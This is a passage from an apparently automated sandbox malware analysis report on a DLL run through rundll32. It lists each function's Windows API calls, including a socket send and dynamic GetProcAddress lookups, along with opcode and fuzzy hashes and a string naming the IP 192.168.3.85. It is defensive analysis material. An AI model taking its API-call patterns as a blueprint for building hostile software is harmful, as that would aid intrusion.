                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: TextWindow$Exception@8Throw_memsetlstrcmplstrlen
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 289641511-0
                                                                                                                          • Opcode ID: 77b0c5cd9ac0cc3ff83a367ab42858fc436f0c74e7fc05fbf85526c4b9223b41
                                                                                                                          • Instruction ID: 8c1f3c136944a2c7f84d91cd4eaa34ef9436e2c15ebeed6ca137d0836ccfc0fa
                                                                                                                          • Opcode Fuzzy Hash: 77b0c5cd9ac0cc3ff83a367ab42858fc436f0c74e7fc05fbf85526c4b9223b41
                                                                                                                          • Instruction Fuzzy Hash: CE01DBB5600314A7E711DF64DDC4BDF77ADEB19341F408065F646D3142EAB09E448B61
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                            • Part of subcall function 100310AD: _doexit.LIBCMT ref: 100310B5
                                                                                                                          • ___set_flsgetvalue.LIBCMT ref: 10032A0A
                                                                                                                            • Part of subcall function 10035135: TlsGetValue.KERNEL32 ref: 1003513B
                                                                                                                            • Part of subcall function 10035135: __decode_pointer.LIBCMT ref: 1003514B
                                                                                                                            • Part of subcall function 10035135: TlsSetValue.KERNEL32(00000000,1003580D,?,00000001,00000001,10035A23,00000018,10050CC8,0000000C,10035AB2,00000001,00000001,?,10035387,0000000D,10050C60), ref: 10035158
                                                                                                                            • Part of subcall function 1003511A: TlsGetValue.KERNEL32 ref: 10035124
                                                                                                                          • __freefls@4.LIBCMT ref: 10032A60
                                                                                                                            • Part of subcall function 1003515F: __decode_pointer.LIBCMT ref: 1003516D
                                                                                                                          • GetLastError.KERNEL32(00000000,?,00000000,?,?), ref: 10032A32
                                                                                                                          • ExitThread.KERNEL32 ref: 10032A39
                                                                                                                          • GetCurrentThreadId.KERNEL32(00000000,?,00000000,?,?), ref: 10032A3F
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Value$Thread__decode_pointer$CurrentErrorExitLast___set_flsgetvalue__freefls@4_doexit
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2731880238-0
                                                                                                                          • Opcode ID: ae3910c06ee5840ca0e9954760db7c1db5c6932cf2e7a7bf95a1dcd3ebd7d57f
                                                                                                                          • Instruction ID: 3ca39206478dd66d9189836c3fdd0f1ffde406c57308cf63c3fc949a3eb6cb77
                                                                                                                          • Opcode Fuzzy Hash: ae3910c06ee5840ca0e9954760db7c1db5c6932cf2e7a7bf95a1dcd3ebd7d57f
                                                                                                                          • Instruction Fuzzy Hash: 9F015E784046519FDB06EBA1DE4594E7BA9EF48243F208458E905CF232DB35E841CB52
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                            • Part of subcall function 100134C0: GetSystemMenu.USER32 ref: 100134D2
                                                                                                                          • GetWindowLongA.USER32(?,000000F0), ref: 1001295E
                                                                                                                          • SetWindowLongA.USER32 ref: 10012989
                                                                                                                            • Part of subcall function 10013460: AppendMenuA.USER32(?,00000000,00000065,00000000), ref: 1001347A
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: LongMenuWindow$AppendSystem
                                                                                                                          • String ID: 192.168.3.85$Message
                                                                                                                          • API String ID: 4121476972-856608562
                                                                                                                          • Opcode ID: 3a485f645eb87c5dda0d91dee484213725162975b6f285bf4b629bdff528d801
                                                                                                                          • Instruction ID: 340d0da2b4c657a0b825359f55c53a9166b08011863532f0c2811cf24d97780a
                                                                                                                          • Opcode Fuzzy Hash: 3a485f645eb87c5dda0d91dee484213725162975b6f285bf4b629bdff528d801
                                                                                                                          • Instruction Fuzzy Hash: F2411B74A4020A9BDB04DB94CCA2FBFB771EF44714F108228F5226F2D2DB75A945CB54
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                            • Part of subcall function 1001E3AC: __EH_prolog3.LIBCMT ref: 1001E3B3
                                                                                                                            • Part of subcall function 1001E3AC: GetWindowTextA.USER32(?,?,?), ref: 1001E3C9
                                                                                                                            • Part of subcall function 1001DDF4: IsWindow.USER32(?), ref: 1001DE03
                                                                                                                          • _DebugHeapAllocator.LIBCPMTD ref: 100130B2
                                                                                                                            • Part of subcall function 10013820: _DebugHeapAllocator.LIBCPMTD ref: 10013875
                                                                                                                          • _strcat.LIBCMT ref: 1001310A
                                                                                                                            • Part of subcall function 100137A0: SendMessageA.USER32 ref: 100137BB
                                                                                                                          • send.WS2_32(?,?,00000064,00000000), ref: 10013195
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: AllocatorDebugHeapWindow$H_prolog3MessageSendText_strcatsend
                                                                                                                          • String ID: :
                                                                                                                          • API String ID: 16450322-3653984579
                                                                                                                          • Opcode ID: 13b8f6eccedc4ccdf4080b13ffaaa0417b73d22118cf8ccc7af144c890aa7e78
                                                                                                                          • Instruction ID: f6b77999ec19404b7b7ce6cfec7bf3295ff1974a42ab232d1976716b8ec2d843
                                                                                                                          • Opcode Fuzzy Hash: 13b8f6eccedc4ccdf4080b13ffaaa0417b73d22118cf8ccc7af144c890aa7e78
                                                                                                                          • Instruction Fuzzy Hash: 01410DB59001189FDB24DB64CC91BEEB775FF44304F5082ADE51AA7282DF346A85CF54
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                            • Part of subcall function 10020E5D: EnterCriticalSection.KERNEL32(10057798,?,?,?,?,1002074A,00000010,00000008,1001FA2A,1001F9CD,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 10020E99
                                                                                                                            • Part of subcall function 10020E5D: InitializeCriticalSection.KERNEL32(?,?,?,?,?,1002074A,00000010,00000008,1001FA2A,1001F9CD,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 10020EA8
                                                                                                                            • Part of subcall function 10020E5D: LeaveCriticalSection.KERNEL32(10057798,?,?,?,?,1002074A,00000010,00000008,1001FA2A,1001F9CD,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 10020EB5
                                                                                                                            • Part of subcall function 10020E5D: EnterCriticalSection.KERNEL32(?,?,?,?,?,1002074A,00000010,00000008,1001FA2A,1001F9CD,10015B30,1001555B,?,10015D3C,00000004,10015139), ref: 10020EC1
                                                                                                                            • Part of subcall function 1002072F: __EH_prolog3_catch.LIBCMT ref: 10020736
                                                                                                                            • Part of subcall function 100201F1: __CxxThrowException@8.LIBCMT ref: 10020205
                                                                                                                          • GetProcAddress.KERNEL32(00000000,HtmlHelpA,Function_0001B602,0000000C), ref: 1001C1E4
                                                                                                                          • FreeLibrary.KERNEL32(?), ref: 1001C1F4
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: CriticalSection$Enter$AddressException@8FreeH_prolog3_catchInitializeLeaveLibraryProcThrow
                                                                                                                          • String ID: HtmlHelpA$hhctrl.ocx
                                                                                                                          • API String ID: 3274081130-63838506
                                                                                                                          • Opcode ID: c4ff01ed609920668b45cb7a661f9e4cbf771a6b1ff00103ddf750d8f10613a5
                                                                                                                          • Instruction ID: 160066d18b9ed5655b72b10460cb3280c451ea5be833735a295996cf30cd07f4
                                                                                                                          • Opcode Fuzzy Hash: c4ff01ed609920668b45cb7a661f9e4cbf771a6b1ff00103ddf750d8f10613a5
                                                                                                                          • Instruction Fuzzy Hash: AB01F431044706EFE721DFA0AE06F4B7AD5FF04B42F114819F48B98452D770E890AA26
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • GetModuleHandleA.KERNEL32(KERNEL32,10033B0B), ref: 1003CB06
                                                                                                                          • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 1003CB16
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: AddressHandleModuleProc
                                                                                                                          • String ID: IsProcessorFeaturePresent$KERNEL32
                                                                                                                          • API String ID: 1646373207-3105848591
                                                                                                                          • Opcode ID: dc24b012ca1fb4bb896a1dc56100cb90a959cbbb7befe9f8aa549c159bb80eea
                                                                                                                          • Instruction ID: 56947a08a2dfe052dc663468ef672e03bc5ef0643ca607e86d2238c745675855
                                                                                                                          • Opcode Fuzzy Hash: dc24b012ca1fb4bb896a1dc56100cb90a959cbbb7befe9f8aa549c159bb80eea
                                                                                                                          • Instruction Fuzzy Hash: EDF0362090091DE6EF01AFA1AD4969F7A74FB45747F510594E592F0094EF7081B49356
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • SetLastError.KERNEL32(0000007F), ref: 100026FF
                                                                                                                          • SetLastError.KERNEL32(0000007F), ref: 1000272B
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: ErrorLast
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1452528299-0
                                                                                                                          • Opcode ID: c9d272d6c554433b4f74cd5ef5cb02bf0863a661864ac41ad17d6d3c26d06b94
                                                                                                                          • Instruction ID: 8e64829365f1e03862022e03b3a1730166a9b8a5af119672a2ae158ec68dc0e1
                                                                                                                          • Opcode Fuzzy Hash: c9d272d6c554433b4f74cd5ef5cb02bf0863a661864ac41ad17d6d3c26d06b94
                                                                                                                          • Instruction Fuzzy Hash: 15511774E0411AEFEB04CF94C980AAEB7F1FF48344F208568E819AB345D774EA41DB91
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Task$AllocFreeH_prolog3_malloc_memset
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2459298410-0
                                                                                                                          • Opcode ID: 56213c16b803c0e3796c36805e348e495a167a55b28ccf8aaf43ce70b74c7790
                                                                                                                          • Instruction ID: 01fa38cd0bce2764ee9a58647bdb5924a3a29805fe2f500651f730ac49990a2b
                                                                                                                          • Opcode Fuzzy Hash: 56213c16b803c0e3796c36805e348e495a167a55b28ccf8aaf43ce70b74c7790
                                                                                                                          • Instruction Fuzzy Hash: A9C14878601709EFCB14CF68D884AAEB7F5FF88304B648919F856CB291DB71EA41CB50
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: FreeTask$ClearH_prolog3Variant
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 365290523-0
                                                                                                                          • Opcode ID: f4bb32272e54c4630c0f1c2b8213bbcb586b41b40c6f53f6c8fe32820d3a87b6
                                                                                                                          • Instruction ID: 6dfbb0beff937a9ff07d9f1090c18b3058f0abcc9665a1e5acd726f5cd97e7a7
                                                                                                                          • Opcode Fuzzy Hash: f4bb32272e54c4630c0f1c2b8213bbcb586b41b40c6f53f6c8fe32820d3a87b6
                                                                                                                          • Instruction Fuzzy Hash: 6D711775A00A52CFCB60CFA4D9D892AB7F5FF483447A1086DE1469B661CB31EC84CB50
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Window$Rect$DesktopVisible
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1055025324-0
                                                                                                                          • Opcode ID: 935237afc4adc895a68147513c1bf8892873bb4cd96f085db3d98f84c1cebb7e
                                                                                                                          • Instruction ID: 30a46d7291c636a93fdcae379f64361bdaca7d323e8f19b7ddc13159497105e4
                                                                                                                          • Opcode Fuzzy Hash: 935237afc4adc895a68147513c1bf8892873bb4cd96f085db3d98f84c1cebb7e
                                                                                                                          • Instruction Fuzzy Hash: 0751E875A0051AEFCB04EFA8DD84CAEB7B9FF48244B614458F515EB255C731EE44CB60
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • _memset.LIBCMT ref: 1002C6E7
                                                                                                                            • Part of subcall function 1001DCEA: _wctomb_s.LIBCMT ref: 1001DCFA
                                                                                                                          • GetFileTime.KERNEL32(?,?,?,?), ref: 1002C71E
                                                                                                                          • GetFileSize.KERNEL32(?,00000000), ref: 1002C733
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: File$SizeTime_memset_wctomb_s
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 26245289-0
                                                                                                                          • Opcode ID: 7b2a999f3c33549589a606ce6b98c8e8e242c4bbabb886e5bb6986c1362b8808
                                                                                                                          • Instruction ID: d07d59a7ff7176791715ff84f3171322556d45097dda904751fff30d64e08997
                                                                                                                          • Opcode Fuzzy Hash: 7b2a999f3c33549589a606ce6b98c8e8e242c4bbabb886e5bb6986c1362b8808
                                                                                                                          • Instruction Fuzzy Hash: 32411B755046199FC724DFA8D981C9AB7F8FF093A07508A2EE5A6D3690E730F944CF50
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: MessageSend
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3850602802-0
                                                                                                                          • Opcode ID: 19518e3b86100b37808dce19ac351571687518489287765c305fecf2a5902a3e
                                                                                                                          • Instruction ID: f22ebcd49f6c4bcf1cb84aabd9b6e0a9805a11e2c96a6edef58545e6592a584a
                                                                                                                          • Opcode Fuzzy Hash: 19518e3b86100b37808dce19ac351571687518489287765c305fecf2a5902a3e
                                                                                                                          • Instruction Fuzzy Hash: 05318F70500259FFDB15DF51C889EAE7BA9EF05790F10806AF90A8F251DA30EEC0DBA0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 1003E191
                                                                                                                          • __isleadbyte_l.LIBCMT ref: 1003E1C5
                                                                                                                          • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,A045FF98,?,00000000,00000000,?,00000000,1003E760,?,?,00000002), ref: 1003E1F6
                                                                                                                          • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,00000001,?,00000000,00000000,?,00000000,1003E760,?,?,00000002), ref: 1003E264
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3058430110-0
                                                                                                                          • Opcode ID: a45d194493aaf76ac1cbb866e4ff6e90a1da533cdec724975968ec5ddac79853
                                                                                                                          • Instruction ID: 9e7ca2975dce83e2c1685c00030f8d0177b945f551d5a1751bafc6038c684fbd
                                                                                                                          • Opcode Fuzzy Hash: a45d194493aaf76ac1cbb866e4ff6e90a1da533cdec724975968ec5ddac79853
                                                                                                                          • Instruction Fuzzy Hash: 23317C31A00296EFDB12CFA4CC849AA7BE9FF05352F168669E8608F1D1D330AD40DB51
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 10026510
                                                                                                                            • Part of subcall function 100201F1: __CxxThrowException@8.LIBCMT ref: 10020205
                                                                                                                          • GetDC.USER32(?), ref: 1002658E
                                                                                                                          • IntersectRect.USER32(?,?,?), ref: 100265C8
                                                                                                                          • CreateRectRgnIndirect.GDI32(?), ref: 100265D2
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Rect$CreateException@8H_prolog3IndirectIntersectThrow
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3511876931-0
                                                                                                                          • Opcode ID: 7f6c9fa0e8688ea19043668f2c8dfda2f995fd9ab5cfcbe19950409bb8c584bc
                                                                                                                          • Instruction ID: 5a52d3282697d26d7181906baa499751bc8b7848460d4ff7fbcd99527b494316
                                                                                                                          • Opcode Fuzzy Hash: 7f6c9fa0e8688ea19043668f2c8dfda2f995fd9ab5cfcbe19950409bb8c584bc
                                                                                                                          • Instruction Fuzzy Hash: 71315D71D0062ADFCF01CFA4C989ADEBBB5FF08300F614459F915AB155D774AA81CBA1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: __msize_malloc
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1288803200-0
                                                                                                                          • Opcode ID: 172559e824c18d3cfeedd4486189817d6fbc1f914f9a457cc390fc68d8836e76
                                                                                                                          • Instruction ID: b47b26af396fa43851c5e16859074de777cbaf7baa699ca6a99f78ce61545289
                                                                                                                          • Opcode Fuzzy Hash: 172559e824c18d3cfeedd4486189817d6fbc1f914f9a457cc390fc68d8836e76
                                                                                                                          • Instruction Fuzzy Hash: 0921C138100210DFCB59DF64F881AEE77D5EF20690B908629F858CA246DB34ECA4CB80
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 1002EB3E
                                                                                                                          • PeekMessageA.USER32(00000001,00000000,00000200,00000209,00000003), ref: 1002EB98
                                                                                                                          • PeekMessageA.USER32(00000001,00000000,00000100,00000109,00000003), ref: 1002EBAF
